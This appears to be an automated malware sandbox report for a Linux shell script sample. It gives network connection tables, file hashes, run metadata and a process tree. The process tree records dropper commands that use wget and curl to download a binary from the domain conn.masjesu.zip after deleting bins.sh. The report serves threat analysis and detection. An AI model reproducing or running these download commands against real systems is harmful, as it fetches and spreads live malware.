| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
Files
/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-20 03:24
Reported
2024-11-20 03:26
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
131s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh
[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 151.101.129.91:443 | tcp | |
| GB | 89.187.167.3:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp |